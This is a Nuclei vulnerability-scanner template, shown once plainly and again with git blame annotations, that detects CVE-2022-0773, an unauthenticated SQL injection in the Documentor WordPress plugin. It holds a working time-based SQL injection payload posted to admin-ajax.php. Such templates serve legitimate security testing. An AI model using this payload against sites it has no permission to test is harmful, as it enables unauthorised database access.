nuclei-templates/http/cves/2022/CVE-2022-0773.yaml

id: CVE-2022-0773

info:
  name: Documentor <= 1.5.3 - Unauthenticated SQL Injection
  author: theamanrawat
  severity: critical
  description: |
    The Documentor WordPress plugin through 1.5.3 fails to sanitize and escape user input before it is being interpolated in an SQL statement and then executed, leading to an SQL Injection exploitable by unauthenticated users.
  reference:
    - https://wpscan.com/vulnerability/55b89de0-30ed-4f98-935e-51f069faf6fc
    - https://wordpress.org/plugins/documentor-lite/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-0773
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-0773
    cwe-id: CWE-89
  metadata:
    max-request: 2
    verified: true
  tags: unauth,cve2022,sqli,wp-plugin,wp,documentor-lite,wpscan,cve,wordpress

http:
  - raw:
      - |
        @timeout: 20s
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=doc_search_results&term=&docid=1+AND+(SELECT+6288+FROM+(SELECT(SLEEP(6)))HRaz)

      - |
        GET /wp-content/plugins/documentor-lite/core/js/documentor.js HTTP/1.1
        Host: {{Hostname}}

    req-condition: true
    matchers:
      - type: dsl
        dsl:
          - 'duration_1>=6'
          - 'status_code == 200'
          - 'contains(content_type_1, "text/html")'
          - 'contains(body_1, "([])") && contains(body_2, ".documentor-help")'
        condition: and
templates added 2023-04-21 08:56:01 +00:00			`id: CVE-2022-0773`

			`info:`
			`name: Documentor <= 1.5.3 - Unauthenticated SQL Injection`
			`author: theamanrawat`
			`severity: critical`
			`description: \|`
			`The Documentor WordPress plugin through 1.5.3 fails to sanitize and escape user input before it is being interpolated in an SQL statement and then executed, leading to an SQL Injection exploitable by unauthenticated users.`
			`reference:`
			`- https://wpscan.com/vulnerability/55b89de0-30ed-4f98-935e-51f069faf6fc`
			`- https://wordpress.org/plugins/documentor-lite/`
			`- https://nvd.nist.gov/vuln/detail/CVE-2022-0773`
			`classification:`
			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`
			`cvss-score: 9.8`
			`cve-id: CVE-2022-0773`
			`cwe-id: CWE-89`
			`metadata:`
Added max request counter of each template 2023-04-28 08:11:21 +00:00			`max-request: 2`
boolean format update 2023-06-04 08:13:42 +00:00			`verified: true`
Auto Generated CVE annotations [Fri Apr 21 11:47:35 UTC 2023] :robot: 2023-04-21 11:47:35 +00:00			`tags: unauth,cve2022,sqli,wp-plugin,wp,documentor-lite,wpscan,cve,wordpress`
templates added 2023-04-21 08:56:01 +00:00
Refactoring the directory structure based on protocols (#7137) * moving http templates * updated cves.json * moved network CVEs * updated scripts * updated workflows * updated requests to http * replaced network to tcp --------- Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-04-27 04:28:59 +00:00			`http:`
templates added 2023-04-21 08:56:01 +00:00			`- raw:`
			`- \|`
			`@timeout: 20s`
			`POST /wp-admin/admin-ajax.php HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: application/x-www-form-urlencoded`

			`action=doc_search_results&term=&docid=1+AND+(SELECT+6288+FROM+(SELECT(SLEEP(6)))HRaz)`

			`- \|`
			`GET /wp-content/plugins/documentor-lite/core/js/documentor.js HTTP/1.1`
			`Host: {{Hostname}}`

			`req-condition: true`
			`matchers:`
			`- type: dsl`
			`dsl:`
			`- 'duration_1>=6'`
			`- 'status_code == 200'`
			`- 'contains(content_type_1, "text/html")'`
			`- 'contains(body_1, "([])") && contains(body_2, ".documentor-help")'`
			`condition: and`